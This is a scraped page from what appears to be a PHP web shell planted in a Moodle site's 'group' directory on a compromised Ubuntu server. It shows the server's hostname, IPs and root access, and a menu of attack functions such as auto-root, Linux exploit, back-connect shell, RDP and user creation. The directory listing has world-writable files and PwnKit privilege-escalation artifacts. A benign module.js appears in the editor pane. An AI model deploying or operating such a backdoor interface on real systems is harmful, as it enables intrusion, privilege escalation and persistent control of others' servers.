Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
group /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
assign.php
6.89
KB
-rwxrwxrwx
autogroup.php
8.54
KB
-rwxrwxrwx
autogroup_form.php
8
KB
-rwxrwxrwx
clientlib.js
9.19
KB
-rwxrwxrwx
delete.php
3.42
KB
-rwxrwxrwx
externallib.php
51.97
KB
-rwxrwxrwx
group.php
4.44
KB
-rwxrwxrwx
group_form.php
5.16
KB
-rwxrwxrwx
grouping.php
5.22
KB
-rwxrwxrwx
grouping_form.php
4.14
KB
-rwxrwxrwx
groupings.php
4.5
KB
-rwxrwxrwx
import.php
10.35
KB
-rwxrwxrwx
import_form.php
1.99
KB
-rwxrwxrwx
index.php
11.2
KB
-rwxrwxrwx
lib.php
30.87
KB
-rwxrwxrwx
members.php
6.79
KB
-rwxrwxrwx
module.js
2.84
KB
-rwxrwxrwx
overview.php
7.81
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
tabs.php
1.53
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : module.js
/* * To change this template, choose Tools | Templates * and open the template in the editor. */ M.core_group = { hoveroverlay : null }; M.core_group.init_hover_events = function(Y, events) { // Prepare the overlay if it hasn't already been created this.hoveroverlay = this.hoveroverlay || (function(){ // New Y.Overlay var overlay = new Y.Overlay({ bodyContent : 'Loading', visible : false, zIndex : 2 }); // Render it against the page overlay.render(Y.one('#page')); return overlay; })(); // Iterate over the events and attach an event to display the description on // hover for (var id in events) { var node = Y.one('#'+id); if (node) { node = node.ancestor(); node.on('mouseenter', function(e, content){ M.core_group.hoveroverlay.set('xy', [this.getX()+(this.get('offsetWidth')/2),this.getY()+this.get('offsetHeight')-5]); M.core_group.hoveroverlay.set("bodyContent", content); M.core_group.hoveroverlay.show(); M.core_group.hoveroverlay.get('boundingBox').setStyle('visibility', 'visible'); }, node, events[id]); node.on('mouseleave', function(e){ M.core_group.hoveroverlay.hide(); M.core_group.hoveroverlay.get('boundingBox').setStyle('visibility', 'hidden'); }, node); } } }; M.core_group.init_index = function(Y, wwwroot, courseid) { M.core_group.groupsCombo = new UpdatableGroupsCombo(wwwroot, courseid); M.core_group.membersCombo = new UpdatableMembersCombo(wwwroot, courseid); }; M.core_group.groupslist = function(Y, preventgroupremoval) { var actions = { init : function() { // We need to add check_deletable both on change for the groups, and then call it the first time the page loads Y.one('#groups').on('change', this.check_deletable, this); this.check_deletable(); }, check_deletable : function() { // Ensure that if the 'preventremoval' attribute is set, the delete button is greyed out var candelete = true; var optionselected = false; Y.one('#groups').get('options').each(function(option) { if (option.get('selected')) { optionselected = true; if (option.getAttribute('value') in preventgroupremoval) { candelete = false; } } }, this); var deletebutton = Y.one('#deletegroup'); if (candelete && optionselected) { deletebutton.removeAttribute('disabled'); } else { deletebutton.setAttribute('disabled', 'disabled'); } } } actions.init(); };
Close